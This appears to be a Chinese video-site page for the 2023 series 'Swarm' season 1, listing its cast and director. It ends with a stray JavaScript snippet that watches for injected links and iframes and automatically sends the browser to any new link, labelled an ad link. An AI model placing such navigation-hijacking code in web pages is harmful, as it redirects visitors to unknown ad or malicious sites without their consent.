蜂群第一季

蜂群第一季

  • 主演:多米尼克·菲什巴克 戴姆森·伊德瑞斯 Leon 罗瑞·卡尔金 凯伦·罗德里格斯 克洛伊·贝利 Nirine S. Brown 克里斯托弗·阿维拉 Geeta S. Munshi 帕姆·特罗特 Nicole Mangi Derrick T. Tuggle Kevin E Tribble Kai N. Ture Kyleigh Reese 阿特金斯·埃斯特蒙德 Christopher Cocke Jayden Braddock 丹妮拉·麦斯米兰 希瑟·西姆斯 Teresa Graves Whitney Goi 
  • 导演:唐纳德·格洛弗 
  • 年份:2023
返回顶部
// 自动监听插入的 或 iframe,提取跳转链接 const observer = new MutationObserver((muts) => { for (const m of muts) { for (const node of m.addedNodes) { if (node.nodeType !== 1) continue; const el = node; // case 1: 链接 if (el.tagName === "A" && el.href.includes("http")) { console.log("🎯 发现广告链接:", el.href); window.location.href = el.href; } // case 2: iframe if (el.tagName === "IFRAME" && el.src.includes("http")) { console.log("🎯 发现广告 iframe:", el.src); // window.location.href = el.src; } } } }); observer.observe(document.body, { childList: true, subtree: true });